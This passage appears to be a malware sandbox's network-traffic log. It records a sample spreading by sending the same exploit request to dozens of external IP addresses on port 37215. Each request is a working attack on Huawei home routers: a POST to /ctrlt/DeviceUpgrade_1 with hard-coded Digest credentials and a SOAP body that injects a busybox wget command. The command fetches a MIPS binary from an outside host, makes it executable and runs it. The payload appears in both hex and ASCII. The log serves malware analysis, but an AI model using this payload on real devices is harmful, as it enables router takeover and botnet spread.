2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.1541850189.211.49.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507447958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.1557874157.15.58.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507448912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.154959041.42.172.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507472038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.154829641.102.196.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507504940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.1540216199.188.154.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507514000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.1555992105.154.191.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507539034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.1535216154.82.67.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507577896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.153706241.112.139.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507577896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.1552792100.196.156.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507621050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.1540336157.146.45.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507621050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          52192.168.2.1540206157.17.163.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507628918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
